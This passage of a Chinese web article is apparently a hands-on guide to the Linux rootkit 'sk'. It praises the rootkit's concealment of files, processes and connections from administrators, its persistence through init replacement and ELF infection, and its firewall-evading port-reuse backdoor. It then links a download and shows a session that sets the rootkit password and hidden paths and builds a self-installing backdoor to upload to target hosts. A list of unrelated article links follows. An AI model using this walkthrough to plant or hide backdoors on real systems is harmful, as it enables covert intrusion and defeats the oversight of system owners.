4：sk采用動態(tài)隱藏的方式來隱藏指定的內(nèi)容，包括文件，進(jìn)程，網(wǎng)絡(luò)連接 。為什么說是動態(tài)隱藏呢，因?yàn)楫?dāng)我們使用sk的客戶端登錄到安全之后，除了文件是根據(jù)prefix隱藏之外，其他的一切的操作都是隱藏的 。這個功能十分之方便，只要我們使用sk的客戶端登錄之后，就可以放心的操作了，不需要擔(dān)心什么東西沒有隱藏而被管理員發(fā)現(xiàn) 。相比之下，adore-ng這類rootkit就有點(diǎn)不人性化了，必須使用客戶端手動的去隱藏指定的進(jìn)程、網(wǎng)絡(luò)和文件 。
5：sk的自動啟動也十分隱蔽，它通過替換系統(tǒng)的init文件來實(shí)現(xiàn)自動啟動，一般情況下非常難被發(fā)現(xiàn) 。

上面我們說的只是sk1.x的功能，sk2在sk1.x的基礎(chǔ)上又有了如下的增強(qiáng)：
;1：后門的服務(wù)端和客戶端集成在一個程序內(nèi)，不得不提的是0x557的sam牛牛修改了putty作為sk2的客戶端，這樣將大大的方便了經(jīng)常在windows下管理安全的朋友們了 。
2：端口回連后門升級為端口復(fù)用后門，可以復(fù)用系統(tǒng)大部分端口，包過濾防火墻在他面前幾乎沒有任何用處 。
3：自動啟動方式完全改變，sk2可以感染系統(tǒng)的elf文件達(dá)到自啟動的目的，比如我們可以感染/sbin/syslogd文件，在syslogd服務(wù)啟動的同時，我們的sk2也啟動了 。這個自啟動方式是十分靈活也十分隱蔽的，就我所知，現(xiàn)在除了sk2之外，沒有一個公開的后門或者rootkit是通過感染elf文件啟動的 。如果想深入的了解ELF感染是如何實(shí)現(xiàn)和變幻的，請留意我的《ELF感染面面觀》一文 。
4：增強(qiáng)了自身的加密功能，程序執(zhí)行受到嚴(yán)格保護(hù)，沒有密碼將無法正確安裝后門或者執(zhí)行客戶端 。

sk2雖然在功能上有了十分大的提高，但是公開版的sk2rc2還是存在一些說大不大說小不小的BUG的，具體有什么BUG我將在下一篇《Linux后門系列--由淺入深sk2完全分析》中一一透露 。

三、sk13的編譯和使用

sk13的安裝和使用很簡單，只需要編譯一次，sk就可以拿著到處使用了，下面給大家演示一下編譯和使用的過程 。
1、編譯
下載代碼 http://www.xfocus.net/tools/200408/sk-1.3b.tar.gz
先配置一下參數(shù)：

以下是代碼片段：
tthacker@wzt:~/sk# make skconfig
rm -f include/config.h sk login inst
make[1]: Entering directory `/root/sk/src"
make[1]: Leaving directory `/root/sk/src"
make[1]: Entering directory `/root/sk/src"
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c sha1.c
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -c crypto.c
In file included from ../include/extern.h:9,
from ../include/stuff.h:18,
from crypto.c:7:
../include/skstr.h:20: warning: conflicting types for built-in function `vsnprintf"
../include/skstr.h:22: warning: conflicting types for built-in function `vsprintf"
../include/skstr.h:25: warning: conflicting types for built-in function `vsscanf"
gcc -Wall -O2 -fno-unroll-all-loops -I../include -I../ -DECHAR=0x0b -s zpass.c sha1.o crypto.o -o pass
make[1]: Leaving directory `/root/sk/src"
/dev/null

Please enter new rootkit password: -->這里輸入rookit的登錄密碼
Again, just to be sure:
OK, new password set.
Home directory [/dev/sk13]: /dev/sk13 -->這里設(shè)置隱藏的目錄
Magic file-hiding suffix [sk13]: sk13 -->這里設(shè)置文件隱藏的前綴

Configuration saved.
>From now, _only_ this configuration will be used by generated
binaries till you do skconfig again.

To (re)build all of stuff type "make" -->現(xiàn)在我們可以開始編譯了
tthacker@wzt:~/sk#make
這里省略N字，當(dāng)我們看到下面的信息的時候，sk就編譯好了
Okay, file "inst" is complete, self-installing script.
Just upload it somewhere, execute and you could log in using
./login binary.

Have fun!

推薦閱讀

• 

  AutoCAD2010如何改背景顏色？ AutoCAD2010更改背景顏色步驟分享
• 

  獵奇的意思是什么意思
• 

  創(chuàng)新中國中的經(jīng)典語錄
• 

  家里怎么清理鯽魚，家里怎么清理鯽魚刺
• 

  夢見和別人下象棋是什么意思 夢見和別人下象棋的意思
• 

  iPhone11的屏幕刷新率是多少
• 

  有關(guān)立冬的手抄報 立冬的手抄報怎么畫
• 

  《星際爭霸2》蟲族雷獸設(shè)計(jì)缺考究，泛用度過低
• 

  行駛證抵押貸款怎么抵押？行駛證抵押貸款介紹！
• 

  抗疫簡筆畫怎么畫抗疫簡筆畫畫法
• 

  寶雞的房價為什么漲了，寶雞房價還會漲嗎
• 

  東莞比亞迪g6二手車，G6二手大概多少錢
• 

  法斗懷孕要注意哪些問題？法國斗牛犬懷孕注意事項(xiàng)
• 

  單招和高考有什么不同呢,單招和高考有什么區(qū)別
• 

  考上大學(xué)送什么禮物
• 

  老人帶娃常見誤區(qū)有哪些

• 利用linux內(nèi)核模塊實(shí)現(xiàn)TTY hijacking
• Linux系統(tǒng)后門技術(shù)及實(shí)踐
• 快速建立linux下的vpn服務(wù)器做加密代理
• Linux下防范緩沖區(qū)溢出攻擊的系統(tǒng)安全策略
• 圖 Mandrake Linux 9.0 beta + Vmware 安裝
• 圖 Linux下SSH密匙完美使用方法
• 小C13版來電顯示人名的測試
• 實(shí)現(xiàn)Linux操作系統(tǒng)的自動登錄
• Linux操作系統(tǒng)十大高級安全管理技巧
• 圖 Linux操作系統(tǒng)打印機(jī)配置全攻略